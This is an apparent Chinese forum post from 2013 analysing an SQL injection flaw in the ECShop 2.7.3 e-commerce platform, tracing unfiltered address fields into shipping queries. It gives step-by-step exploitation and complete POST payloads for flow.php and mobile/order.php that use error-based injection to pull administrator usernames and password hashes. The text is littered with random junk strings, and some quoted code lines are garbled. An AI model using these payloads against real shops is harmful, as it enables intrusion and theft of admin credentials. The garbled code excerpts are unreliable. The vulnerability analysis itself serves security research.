前段时间大概2012年圣诞节左右,在t00ls上看见ecshop全版本注入,当时也下载了最新的程序分析了下,最近考试比较忙,今天刚考完,把我分析的记录下来。$ g# }- V2 }3 c4 k+ R
+ y5 u3 ]: T+ Q' _7 @ Y
漏洞关键文件:
8 m( X% Z/ G% l& S2 P
: ^ J0 A, ^3 L: X8 Y /includes/lib_order.php8 h* a: D0 j( K5 s1 x
& k: h' V6 I8 k1 o; ?# c
关键函数:
4 O& [* ?/ Y" n' e$ y! G; T5 Y
: U6 y5 q& w2 A% C O - e4 O: `+ O: I! p* j9 D8 a
j5 K' I, r+ l5 M8 z, [01 function available_shipping_list($region_id_list) $ b# d! m I* j& M/ r
+ l# Y3 H* }) G) t2 \# z: s7 d02 {
/ l0 D+ `& ]) k+ `1 N: v. N; J3 ^, L& g+ \: Y7 T, ~9 E
03 $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' . , D# \# P9 c C
) \6 d5 w2 R( _& q2 {04 's.shipping_desc, s.insure, s.support_cod, a.configure ' . 7 j7 d$ y) I/ p& B: _* M9 C
0 m! {% B7 v6 P' i+ }0 H05 'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .
5 `+ @' d( Z$ O# r% B8 [! O2 K' s3 Z* b+ T, E) L4 D
06 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' .
2 @5 l5 m, k: |% I+ T6 Y* c. m6 T( Y2 x) b0 k$ q3 w
07 $GLOBALS['ecs']->table('area_region') . ' AS r '.
2 c( B, b3 }9 e6 h7 C
; r2 O8 \3 L. [. F4 B/ y7 u. w1 W4 V08 'WHERE r.region_id ' . db_create_in($region_id_list) . * U8 h; p* ]% L; P$ \
3 Y4 Y) W& ^5 J5 ?% k T- @) C! k09 ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order'; ) s4 M7 m$ I C0 V0 X* Q) ^
. {3 b: w& o. O# h9 ^( }10 - A1 R5 O- D, e6 ^4 B- f
5 I, B# ^9 q) _, l" D
11 return $GLOBALS['db']->getAll($sql); O3 i% M% z% i. U# o5 }
/ }3 q/ P+ e! c i
12 }
) s" C0 h& h# N) }, Y9 a) s# s4 k; I5 I- P' N3 z
显然对传入的参数没有任何过滤就带入了查询语句。( i* l9 `3 `+ d p; K
9 y& x; } t7 j0 |2 i4 |下面我们追踪这个函数在flow.php中:$ W5 @6 |% i4 N
第531行:
: B0 ]7 {( M- B6 D" A+ c( j6 W5 W& U# Q1 L6 @) u/ P6 Z
1 $shipping_list = available_shipping_list($region);
5 I3 l( U2 f5 s9 [" H
$ _3 W: h, i$ S$ e6 ~! d3 v: |
, j% [6 J& }% {6 ]
; E, ~0 ~1 V4 z% p 6 q+ J5 N2 I5 ~' ]' e7 r! R* [
4 U) u1 {4 G2 E5 ?+ V% [再对传入变量进行追踪:
3 I$ s4 ^0 _6 `- O: g; h+ v7 @
" Z8 W+ P( C% {第530行: ; _9 J9 D* A( P% n
- g7 l2 ]5 Q9 Q# s8 [& E. J
1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']);
n/ t% b- F$ O) s$ M7 d$ C1 `2 L; b5 K% Y* Z/ a$ Z% [4 a
" m6 {+ L; b* x% G# a& B
U) [% Y1 X2 a7 G3 A/ m E 2 c: x/ v A% A; }
! k) \. B9 M" r2 v' Y* _
第473行:
7 d* U! {" P! Q; p3 T& H' w0 ~( G( q7 L; N: {
1 $consignee = get_consignee($_SESSION['user_id']);
, i7 s* `$ g$ ?) Q5 i2 z n: K9 N5 T7 @; d% v0 T, d; }7 h
到了一个关键函数:
7 z. ]# t) p- M) A, V+ ^; p7 N
& ?. q8 N) @# K( }/includes/lib_order.php
. K4 E7 h, q( A& {) p6 A' t0 e' }- \. q( Y
, J" w b+ v' ~/ T# N5 s8 A9 D
5 J) q' J. M- p! y; @5 ], V p
' D; @* Q7 v' I+ X& W- w$ E
2 @ W U( Z% P$ F s. t- g01 function get_consignee($user_id)
- _+ w, M, T. }( \( O6 o: W$ k9 I- f$ v) G1 M
02 {
0 G& {% y9 T; Q' z" U v) F
) u( q1 h6 t1 A4 R0 z9 z03 if (isset($_SESSION['flow_consignee'])) , p5 l# ^$ @) |1 p# A
7 a3 h) J) e8 V j* Y
04 { + F( ^7 o8 B$ C# h5 h! x' X# e
; n/ Q1 ?2 s, J: g& @7 X
05 /* 如果存在session,则直接返回session中的收货人信息 */ & W- D; v5 X# X' H( T( ^& }* a
0 h1 w) W `/ Z9 d- d: ?/ m06
( G8 z- s( R( G' ?/ G2 Q
0 T" a4 x# W% m" @ ?07 return $_SESSION['flow_consignee'];
( O6 f" X2 U7 a
8 V8 Q4 H) g) G# \3 c& \ Q08 } 8 p! o4 E# ~) [! } c# P6 i
m$ ?2 c U+ _3 `$ \, s8 E2 @
09 else
, ?- F$ ` a8 Q0 [
5 C9 v# a& u+ k9 y0 e10 {
+ V6 v; y! X( C4 v7 K. m
. |7 d a1 W, k0 @+ z11 /* 如果不存在,则取得用户的默认收货人信息 */
! g( I: @- J( F5 s, K% p* U6 ^3 E: u( v, q6 X2 s
12 $arr = array();
! M% b0 b. o: U6 I& Y n, y/ c1 s- T( A
13
& R9 {% x) m* _3 }) Y# e9 N3 Y( M- V, U( ]" r2 i4 `7 _/ s3 k3 _
14 if ($user_id > 0) / K- p9 q3 A" Y. o6 Z8 l
( C! G7 H: w3 ^7 h& ^15 { ' ^$ F. I+ z q
) ?+ I% ]' i) v16 /* 取默认地址 */ 1 `0 L% \ I# B5 ?7 N+ b' n
9 b+ {4 \. k9 h. Z17 $sql = "SELECT ua.*". " _& h r: m5 L
9 D9 e- ]3 C v1 D7 `5 C. ~18 " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.
6 T/ f5 q0 N& ^
L) Y" L3 q7 k6 N6 m8 R5 p$ Z19 " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";
9 r Z$ U$ v3 ?3 L* ^! e- j7 n% q$ [0 F! R- q1 h
20 + v* i* N% o( t1 _
M6 \' x2 d! ?+ N1 {
21 $arr = $GLOBALS['db']->getRow($sql); - ^8 [9 e3 V* I2 t6 Y3 ~- }7 d5 `
* W" }$ T* c4 o9 [2 U( q% }22 } " L1 ^" ~- _+ `8 i: R
; D. J; Y* ?7 {. T" Y# k
23 O( m5 s3 _ s2 p
* n. r: J4 g8 ~/ Z* O% |( h$ _- N3 ^
24 return $arr; . F) k/ I, J4 F9 k; g B4 C/ F
8 x1 p, ?7 x/ q# I9 M: c
25 } ) {6 t7 r! u$ ~! m
5 O3 \8 f5 W( q* H: _6 }# v
26 }
6 O% |5 @/ V" h0 v
- j* k; f6 }+ J显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢?
) n/ p. }4 M4 i. i
! d; Y4 D, c5 F6 m0 u l- ] 4 B8 i# Y0 g3 A% {# L- I7 m
2 u6 N$ p! A' G. K关键点:5 C" c' n& l) I( C6 U/ o3 i
( Q) c& k. c" K" n7 I& _. x
第400行: $_SESSION['flow_consignee'] = stripslashes_deep($consignee);" r& M# |& k' F2 @
; @2 {7 u6 g% N0 g; J# E
这里对传入参数反转义存入$_SESSION中。4 U( _4 K& _ f- R
+ z# i6 b& n. e5 y- k# |: `1 V% e 9 W( s8 A% `2 u
5 u# ^; {$ d; D9 u* Q+ @然后看下:
( e: F3 e. H; c! j8 P" F/ o
6 {0 S) [4 I& A
- h' J& m0 v+ h2 x- |/ E5 I2 S" S7 c, e0 p$ V, k) m; d
1 Z0 U' t$ l! X) p
) ^8 @' I) V# J* x: Z; b4 H01 $consignee = array(
" O8 C) C: K) X7 S: f
1 D' F) a+ K9 N6 o/ k, o% y02 'address_id' => empty($_POST['address_id']) ? 0 :intval($_POST['address_id']),
, q; l1 j: Z2 \( y# a% G. K
# \% L# H3 L" R: T8 R! \0 Z" Y03 'consignee' => empty($_POST['consignee']) ? '' : trim($_POST['consignee']),
, t# a; s5 g1 Q% e$ k* Q g I" u3 h/ ]
04 'country' => empty($_POST['country']) ? ''  _POST['country'],
: }. ^& L- w9 D6 @) v: @7 |6 }' @7 g
05 'province' => empty($_POST['province']) ? '' _POST['province'],
, X0 J& V' _& c+ ?4 \/ \8 @% p0 _/ `6 y: U7 n0 K+ J1 J- {" I9 U. L
06 'city' => empty($_POST['city']) ? '' _POST['city'], ; A: m$ m; {7 k
6 G! m( ~( W$ p6 C+ ?07 'district' => empty($_POST['district']) ? '' _POST['district'], / Y1 _9 d ?( e& Z { ]
5 m# S7 U/ ~2 G8 @, w& L6 T" H! k08 'email' => empty($_POST['email']) ? '' _POST['email'], ! g3 E- {+ R1 Q+ ~& u& i, C
5 G* G* z7 J7 w3 k# e8 C' v: L
09 'address' => empty($_POST['address']) ? '' _POST['address'], - f$ u+ W: z" g3 A5 S6 {/ h2 z
' t. j- g/ h$ Q" y5 R6 w! { d g3 N- U10 'zipcode' => empty($_POST['zipcode']) ? '' : make_semiangle(trim($_POST['zipcode'])),
+ {; r" j$ I0 s
1 ]9 Z. Y. }, b9 G11 'tel' => empty($_POST['tel']) ? '' : make_semiangle(trim($_POST['tel'])), 5 z1 S1 v) b* \$ ^" e8 ^
: w, \" M3 p4 C0 Q; Q% T3 B: J- O12 'mobile' => empty($_POST['mobile']) ? '' : make_semiangle(trim($_POST['mobile'])), 4 ~; _9 f ~ m. D. S# c' k0 }
1 J8 Q3 D) P0 R; d13 'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],
) ]% e b d" ?: S H4 N5 b3 v, o$ b# s; S* Z( ^! q3 u3 m/ Z
14 'best_time' => empty($_POST['best_time']) ? '' _POST['best_time'], ' d4 W* e+ s1 N! ^: i5 C9 w
. F ~6 B/ ?$ O/ w: m/ I Z. }8 s15 );
( D$ y* C9 G+ B( P- R6 J2 C" v# s( {2 s4 {6 f4 ^% W4 V
好了注入就这样出现了。
( S- U' N# }7 g
, @ }3 x2 Y( \8 s( H$ h================== Z7 }# ?3 R' b
4 J6 F8 M6 k9 q+ c) S
注入测试:
) c% @" X% Y. e# C2 C7 M i T7 j1 ~% p0 V5 t4 d0 R4 E6 ~- r
环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)
& C# c) q% s/ q* [0 ?5 P7 y( j' x/ ?( Q- F: p8 g R, S
测试程序:ECShop_V2.7.3_UTF8_release11063 c. t4 ~! q1 m8 g
' I1 l! c1 D* {" p+ f$ Q
5 L2 j' x9 |( P, \
$ i! V' V6 D8 C7 c8 Q9 Z1.首先需要点击一个商品加入购物车
# x6 u9 [; }( W2 e* I' p; ?: ~
+ C P5 G! f$ B" M. b. s2.注册一个会员帐号. D( y+ Z6 C! O- U" \
# B% T; k3 `& i7 R
3.post提交数据* o) d" @ A" D& D4 z; {
v! ~1 E3 Q8 e$ Y! g 3 n6 l+ B2 d& K+ P+ _9 B5 z
) b/ z4 } o* K# o' N1 http://127.0.0.1/ecshop/flow.php " u3 F K3 Z) Q/ ~0 e+ q; V/ q
* m. g6 j5 l7 ~, k1 Y! i2 & f* Q' Q6 Z( a( ]
) h0 }. _. V: F3 C: P4 R( X0 Y8 C# F
3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
& S9 }. {# Z) a举一反三,我们根据这个漏洞我们可以继续深入挖掘:
& I& U5 C! g/ p6 y4 c. x) K" Z6 k2 K
我们搜寻关键函数function available_shipping_list()8 f. `& {2 g& W: G
0 x% F6 _8 }" p
在文件/moblie/order.php中出现有,次文件为手机浏览文件功能基本和flow.php相同,代码流程基本相同( q3 r: X6 M. L1 q
2 A% K1 {* c8 I2 L0 M: M利用exp:
$ l( F' r( c2 P, C: H" {5 f3 |1 ~
; H4 [& T% M( n/ a1 Z3 s1.点击一个商品,点击购买商标
* o; r6 |* Y: T6 u. o1 b# _/ [3 u1 i& z" e) L
2.登录会员帐号
! B) d: G& r* p; n5 i5 S8 l+ K0 k1 e8 q. n) B5 O3 @
3.post提交:9 z6 E3 m) Q/ L& j5 U
1 z; N/ S! C% I+ e& Q! f9 chttp://127.0.0.1/ecshop/mobile/order.php
0 \2 d! E4 `1 ~" U
: {0 N0 j8 @9 o, Q, D% ~" ?& f
8 O& D' q4 C# V9 y x) @! d# H9 W% S5 _% P! j: v, x" f/ ^
country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=. C- Y6 e) \% x* [
% q6 K O* \( y% d
|
发表于 2013-1-13 09:48:03
收藏
支持
反对